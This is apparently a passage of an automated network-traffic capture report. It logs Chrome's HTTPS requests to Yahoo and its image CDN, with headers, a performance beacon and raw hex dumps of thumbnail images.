                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1080INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Disposition: inline; filename="35a87f10-7eff-11ef-b37e-1db661b209fc.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Etag: "39b1bc24d49268fbb6fd0ed2211bc2c3"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 30 Sep 2024 07:40:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Request-Id: 4bb9e8c9017c16cc709a0afc370810d5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 12:18:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server-Timing: cld-fastly;mitm=po;dur=1;cpu=0;start=2024-09-30T12:18:58.230Z;desc=hit,rtt;dur=87,content-info;desc="width=356,height=180,bytes=6620,owidth=4110,oheight=2740,obytes=2507252,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 18120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cld_id: 4bb9e8c9017c16cc709a0afc370810d5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-image-width: 356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-image-height: 180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 19764
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 00 b4 01 64 03 01 11 00 02 11 01 03 11 01 ff c4 00 1d 00 00 02 02 02 03 01 00 00 00 00 00 00 00 00 00 00 06 07 05 08 03 04 00 02 09 01 ff c4 00 46 10 00 01 03 03 03 02 03 05 04 06 09 02 06 03 01 00 01 02 03 04 00 05 11 06 12 21 07 31 13 41 51 08 22 32 61 71 14 42 81 91 15 23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: JFIFCCdF!1AQ"2aqB#
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 54 af c8 65 1b 38 e3 20 e3 03 b5 43 da 39 1f 59 cb 64 71 f8 52 ed 97 5a 32 ac 25 7c 9a b1 70 d3 4e 28 22 da 81 8a e2 17 92 2e 53 91 d7 7e 4a 8a fe f8 a9 41 7e 06 0b 6e b6 23 b6 10 ad d9 1c d3 11 f0 29 35 4c 74 74 f9 86 5f b2 ee 58 ee d9 a3 fc 02 b1 7c dc 36 d3 ae d5 b3 8c b8 ac d0 7e 4b 16 16 00 26 dc d7 1d 86 68 d1 07 25 a3 7e 3b de 0c 67 4e 33 b9 24 77 ed 52 c1 a1 79 72 96 e4 8b b2 50 a1 9f 78 73 40 6a c6 22 25 bd a4 81 fd 1f 92 3d 28 2d 84 45 3c ba 7b cb 2e 63 cc d1 22 41 a7 19 7f ac 02 a4 e2 7e de c1 2d 95 0a a3 d1 c6 75 8d b8 aa 37 64 48 9f b5 6a 34 46 8e 1a 7d 05 44 71 df 15 44 ac 1b b3 b5 da f4 d5 c5 a4 b2 d3 45 38 07 27 76 6a f1 54 55 83 ae 44 68 8c e2 8d 1d 00 94 9d 1a ae 41 6b 3f e9 57 f2 09 c9 8c 0d 1d 01 a5 c7 46 3c be 55 5a 26 33 67 79 f0 1a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Te8 C9YdqRZ2%|pN(".S~JA~n#)5Ltt_X|6~K&h%~;gN3$wRyrPxs@j"%=(-E<{.c"A~-u7dHj4F}DqDE8'vjTUDhAk?WF<UZ&3gy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: fa 8d 20 1f b1 47 c8 9b d7 56 38 4b 75 d9 a8 90 87 1c 5f c5 b7 f9 d1 97 ea 96 f4 15 74 95 11 17 7d b5 32 e3 a5 a0 07 bd e7 b6 8d ef 7d ce c5 e5 8a a0 6c e9 a8 9f 61 74 20 0e 0e 39 a3 45 58 bc e1 da 1b a1 5b 80 03 c8 55 93 06 60 98 d2 94 d7 15 12 d2 25 1d 62 c5 71 5b 71 40 61 22 6b 5d 1b 5a 37 6f 18 ae 2c c2 8d 35 ef 5b 80 c7 61 55 60 d7 90 75 f4 ff 00 ee 24 24 8f bd fc ea 13 d8 65 e0 75 43 88 d2 ed 6d e1 20 7b b4 e7 1a b4 27 c9 a6 37 ba 7d 22 12 6c 98 ff 00 01 a3 5d 15 a0 1e 3b a5 3d 48 7d be f9 70 fe 14 24 4b 2c 3c 17 15 fa 3d a0 3d 05 33 04 05 c8 db 42 14 62 bd 9f d9 35 2d 59 44 2d e7 34 a6 ef 6a 46 73 8c 73 43 90 c4 45 17 b4 8a 37 59 13 f2 06 95 e5 54 19 14 d2 fe 8d 89 23 d0 9a 98 78 20 86 86 e6 e7 87 1d aa eb 47 0e dd 31 2d 85 c0 41 dd 8f 71 03 f8 d0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: GV8Ku_t}2}lat 9EX[U`%bq[q@a"k]Z7o,5[aU`u$$euCm {'7}"l];=H}p$K,<==3Bb5-YD-4jFssCE7YT#x G1-Aq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: e2 cb 66 3e 4a 6a 20 12 9f 5a ee eb de 73 e8 2b 72 3a 56 62 4a db a6 34 f4 b3 42 44 54 e7 8d d8 e6 ad 65 49 79 b0 5a f0 b0 6a b2 da 0a 99 10 11 e0 3a 02 4f 06 96 65 d1 a9 3d f4 38 4a 47 ad 55 15 0e 34 99 db 6b 4f 1f 77 34 44 89 4e 88 1b 83 7e 26 a8 6c 11 dd 69 3f c6 80 bf b0 b3 d0 df 6e 1b 1f a2 50 31 8f 76 b4 54 68 52 61 16 83 23 f4 4a f1 fb 26 b9 a0 6b 44 6d b6 e2 61 eb 95 23 38 ca 87 3e b5 68 32 c5 ae d2 ad 26 7d bd b7 0f bb 84 8e 3b d3 50 62 f2 26 64 44 1e 03 81 28 1c 20 d7 33 90 ae ba c4 5c 7b ce e5 60 05 f6 e3 d2 aa c9 8b 15 5e d3 2c 85 69 b3 f4 a4 39 d6 c3 22 90 6a 46 82 19 df 8f 3a b4 16 8b a0 59 44 24 e7 1c d7 49 a4 48 67 a7 96 55 18 00 4f 61 42 2f 18 b6 66 b9 27 90 4f ad 75 a2 dd 86 bc 64 e1 60 e2 b8 19 bc 13 9f 2a b2 65 5b 3a bb 84 24 9c 77 ab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: f>Jj Zs+r:VbJ4BDTeIyZj:Oe=8JGU4kOw4DN~&li?nP1vThRa#J&kDma#8>h2&};Pb&dD( 3\{`^,i9"jF:YD$IHgUOaB/f'Oud`*e[:$w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 8b 6f 6e 30 c2 52 93 f3 a0 b8 58 dc 11 20 2d 13 de fe c5 8d d8 ef ce 31 43 97 15 f8 1b 8d 24 74 5e 91 4b 29 12 2e 0a 53 ab f2 dd 55 f4 1f c8 d7 0b 24 20 5a 61 a4 a5 b4 b6 00 3e 78 a3 2e 34 fc 84 ef a3 ed d6 de f1 02 3c 44 02 06 77 1c 54 3e 04 c8 79 14 b6 06 5d 2d ed b8 f0 0a e4 8c f6 14 bb 8d 00 7c f1 60 56 a7 b0 ae 0a fe d2 15 bd 27 be 07 7a aa 74 ca 4a 5d c8 d4 b2 ad 99 29 da f0 c9 ec 93 f4 ad 68 bb 31 b2 69 31 35 d7 e8 0d b5 2d a9 0d 9c 6e dd 91 8f a5 6f 74 e4 79 fc f5 7b 06 f4 3c c5 86 5a 4a 47 7c 66 b4 58 8d 68 63 ad 25 4c 93 df 8a 13 f0 5a 26 82 a2 12 bc d2 cc 61 18 a5 45 50 73 b5 59 32 b2 54 86 76 86 83 24 59 5a c0 fb 8a a3 c4 59 83 77 65 96 35 b4 76 64 0c 20 bc 8e 3f 6b 9c 7f 3a 59 7f 69 2f c1 61 1e b7 45 7a c4 ea 43 78 dc 33 9f 4e 2b 5d 0a 49 90
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: on0RX -1C$t^K).SU$ Za>x.4<DwT>y]-|`V'ztJ])h1i15-noty{<ZJG|fXhc%LZ&aEPsY2Tv$YZYwe5vd ?k:Yi/aEzCx3N+]I
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC372INData Raw: e5 ed 05 64 84 a8 79 95 04 91 84 80 33 b7 8c 8c 67 ca b2 3e 76 6c 46 17 e0 7f 74 a3 a2 91 ad 96 c6 cd c9 e7 24 be 02 4a d6 e7 e3 c2 47 64 a4 79 01 c7 ef a4 a5 91 f0 6a 63 63 fc b1 d3 0a c5 69 80 84 a6 3c 34 0d a3 8c 0a 41 bb 66 95 51 22 da 03 43 6b 41 09 1f 3a 1b 2e 76 ce ef 24 f1 f2 a0 4e 3b 2c 9b 07 ae 0d 06 d0 b4 48 63 29 1d 94 28 4d 0c 40 5d df 99 f1 52 a1 bb 6e cc af b7 7c 79 55 06 62 c5 be aa b5 41 b8 c7 52 9e 68 05 2b 8d de bf ef fd f1 81 45 86 99 6d 34 6a 69 3b 5a 83 6f e9 bb ec 61 22 d9 70 41 43 a9 59 f8 7d 14 3c f7 60 fa 11 82 41 18 e2 9f e2 97 e0 f3 19 9c 76 c0 e1 a0 dd e9 be a4 95 6b 0a df 11 d5 78 b1 48 56 40 6c f9 03 e7 e5 c9 24 d7 a7 c4 ca b5 4c f3 39 18 d4 ed 12 2e cc 06 e6 d7 1e 55 a5 2d ec 51 2f c1 bf 36 52 d0 d1 f0 fb 9a 1b 38 82 d3 ce
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: dy3g>vlFt$JGdyjcci<4AfQ"CkA:.v$N;,Hc)(M@]Rn|yUbARh+Em4ji;Zoa"pACY}<`AvkxHV@l$L9.U-Q/6R8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: fd 9e 7c bc ff 00 3a f4 1c 78 b4 f6 67 c6 6d 30 0f 56 ea db 86 b1 74 bb 73 3c 28 f6 ce 6a 9d 55 7f 8a c6 70 e4 fd 73 7f a2 fe 1b 12 d6 cb 8b c6 d5 80 0e 3b f7 af 8f f2 c7 ea 67 b2 5f 69 6a 6c b2 58 54 16 da 4a f9 15 4e ed 10 91 ab 75 75 d8 8e a4 a0 8c 2e b2 72 91 bb 8b e0 95 8f ab db 89 6a 25 47 0e 27 8e f4 98 d5 83 b7 29 da d6 fe b5 48 8f 24 c7 68 f7 56 7b d7 53 23 40 15 c6 15 ed b9 07 c5 bb ba f6 7b 7b d9 c7 ef a9 69 85 8f 91 b7 a1 98 8a e5 b3 f4 7c 84 ee 5a 90 42 b2 7d 68 4f c1 a9 8d bf 22 a7 5f e9 97 ec 5a cd a9 f1 7d cd ea dc 9e 3b d2 fc 19 1b a6 17 a8 63 7a ea d0 79 6a bb de ee da 61 4c b5 6e 0f a9 c4 ed 0b 2b fe 58 ad 55 4d 18 8a 2e 3a 60 54 ee 98 5c a7 be 5f 9a b0 da cf 21 09 51 f7 7f 1a 43 26 55 e0 3c 6d 81 9a ff 00 4c 7e 84 84 82 42 81 20 ab 38
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: |:xgm0Vts<(jUps;g_ijlXTJNuu.rj%G')H$hV{S#@{{i|ZB}hO"_Z};czyjaLn+XUM.:`T\_!QC&U<mL~B 8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: d0 ed 9e d3 33 f4 25 ca 2c 96 c2 da 5c 52 92 93 f7 89 18 02 8d dd a1 75 a6 2b b4 fa 5a 61 6f 3c 84 ed 42 08 dd 93 92 4f ae 7f 97 96 2b ce f3 ca ac de c3 86 8c 77 8b 8a 56 f8 75 28 f7 06 72 ac f6 ac 55 0e e6 6e e3 ae d3 5c ea 38 d1 03 69 6d c6 d5 b8 6e 24 ac 01 9f ad 37 1e 04 3c f9 55 04 6c df a0 c8 6d ad 8a 18 59 c7 20 9c 7c ce 07 6a b7 a1 60 fd 4b 66 75 4c 8e 1c 43 61 d0 77 e7 b7 95 56 58 f5 e0 bc 66 9b 23 6e 32 bc 27 01 4b 9c 1e 06 7f 8d 2d da 86 53 a2 12 f9 72 30 1f 52 52 f6 5d 3f 03 1e 87 eb 47 58 d7 e4 a3 e6 68 5e ce 97 a9 ee 13 9e 25 28 79 b6 94 40 52 97 b4 e3 e4 9c 1f e3 5c f0 d0 0e e6 d8 2d a9 fe d2 dc 75 4a 7c 6d 47 f0 ac c9 c7 4d 51 a8 9a 68 c7 a5 b5 6b 96 d7 52 e3 6e ee de 92 92 33 8a b6 3f d2 cc ec bc 7b 56 89 fd 5d ab ed da 9f 4c a5 6d bc 8c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 3%,\Ru+Zao<BO+wVu(rUn\8imn$7<UlmY |j`KfuLCawVXf#n2'K-Sr0RR]?GXh^%(y@R\-uJ|mGMQhkRn3?{V]Lm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 7a f2 3c eb 90 16 d8 99 d2 d2 d6 bb 1b 68 da 46 40 19 cd 5d 2b 0a 86 dd 8d 18 b6 b5 83 fb aa 53 2d 63 f5 0d 85 7c 38 a1 c7 c9 7a 06 a6 e9 38 ba ba f6 cc 49 79 5a 1a 21 41 bf 25 1a d8 c5 a6 ac 53 26 54 59 2b 3f 46 f4 f5 9b 4d b8 b8 51 02 16 fb 5d f1 db f7 d6 92 ee b3 35 c6 cf 3e 7d a4 a4 da 61 6a 47 ac 50 d5 99 31 14 a1 20 63 e1 27 b0 fd c6 bd 8e 2e f8 55 99 fc ba 65 6d d4 2e 96 d0 4f ad 07 21 af 05 a0 be 46 17 43 54 99 d7 17 59 6d 58 74 a1 1b 0e 33 eb 9a f0 1f a8 71 29 da 3d af 41 c9 5e 19 65 2c fa 58 c7 8e a9 12 9d c2 d0 4e 51 b7 f9 e6 bc 72 5b 3d 1b 83 ab 31 dc 0f ea fc 41 f7 73 41 e7 88 7e 0d 1c d3 3a 86 5d ba 58 69 4e 71 9a 41 a1 fb 19 9a 7f 58 21 c5 a1 a7 80 01 5d b9 a8 89 66 93 18 11 35 1b 3f 62 4b a9 5e 4a 46 0f 34 cc 58 37 0b 14 1a fe cd 7c d4 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: z<hF@]+S-c|8z8IyZ!A%S&TY+?FMQ]5>}ajGP1 c'.Uem.O!FCTYmXt3q)=A^e,XNQr[=1AsA~:]XiNqAX!]f5?bK^JF4X7|p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: af 7d 8c b5 9f 8b ce a5 4d 96 8e c9 c8 8c 6e 8f e1 af 18 39 24 11 eb 46 48 53 9f f0 6a de 35 75 b6 ca d9 88 a0 a7 dc 4f 93 47 27 f1 ab d3 02 b8 17 90 0f 51 6a 0d 4d 79 93 98 d6 a6 d9 8e 94 ed 0a 70 ff 00 a5 21 ce 94 cd 6c 7f a1 03 8b bb de 63 b8 a6 25 c3 42 d0 a1 dd 1e 54 af a0 98 58 dd 93 12 ad 21 ed 3e e3 cf 24 1e 33 8f 4a 5b 9f 81 0c 41 d8 aa d3 ed f8 5d 44 b3 0f ff 00 da 8f e3 5b 3d 1e 9f 3c 50 87 57 d6 3c d9 e9 3b 10 93 23 4f c7 65 69 c8 53 38 af a0 cb 67 c9 f9 5b 72 28 e7 b6 36 82 c5 b5 db 93 31 fd e6 f7 1e 3c e9 5c 98 e8 73 19 95 0f 4d 4d dc 82 85 8c 67 ca b2 1f 93 49 13 aa 52 55 da a5 16 45 8b e8 5b 4e 3f a3 e2 a9 03 fb c7 33 ff 00 71 a2 a1 35 e4 08 ea d1 72 1f 52 2d 12 5a 57 be 97 1a 5a 4e 3b 1d c3 14 b7 2e f9 10 4a a8 9e 95 69 79 f7 67 b4 e2 1e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: }Mn9$FHSj5uOG'QjMyp!lc%BTX!>$3J[A]D[=<PW<;#OeiS8g[r(61<\sMMgIRUE[N?3q5rR-ZWZN;.Jiyg


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    66192.168.2.44982887.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1423OUTGET /_td_api/beacon/performance?ybar-init_0=0.40000000002328306&ybar-mod-sidenav_0=2&ybar-mod-logo_0=0.20000000001164153&ybar-mod-searchbox_0=0.5&ybar-mod-assistjs_0=3.1000000000058208&ybar-mod-adaptivenav_0=0.1999999999825377&ybar-account-init_0=0.7999999999883585&ybar-mail-init_0=1.3999999999941792&ybar-mod-navigation_0=15.10000000000582&ybar-mod-notification_0=0.39999999999417923&src=ybar&_rdn=857348&apptype=default&rid=1pa4ckpjflnfm&bucket=900%2Cseamless&device=desktop&osName=windows%20nt&browserName=chrome&browserVersion=117.0&site=homepage HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC589INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    expect-ct: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-powered-by: Express
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-type: image/gif
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-security-policy-report-only: default-src 'self'; report-uri https://csp.yahoo.com/beacon/csp?src=fendr_beaconeater.media.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    date: Mon, 30 Sep 2024 17:20:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC762INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    67192.168.2.44983087.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC530OUTGET /uu/api/res/1.2/EP05qSSZkDRwnsJtEV.Bmw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/84608c70-7f17-11ef-bfc7-ce05e04ea18c.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1079INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Disposition: inline; filename="84608c70-7f17-11ef-bfc7-ce05e04ea18c.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Etag: "078e319bebf44a78d00f2b1c413aa3a9"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 30 Sep 2024 10:34:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:41:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server-Timing: cld-fastly;mitm=po;dur=5;cpu=1;start=2024-09-30T16:41:41.835Z;desc=hit,rtt;dur=93,content-info;desc="width=356,height=180,bytes=11842,owidth=2027,oheight=1141,obytes=242445,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-request-id: 11b11dbba4c435e739f9c231f5f902c9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 2357
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cld_id: 11b11dbba4c435e739f9c231f5f902c9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-image-width: 356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-image-height: 180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 27433
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
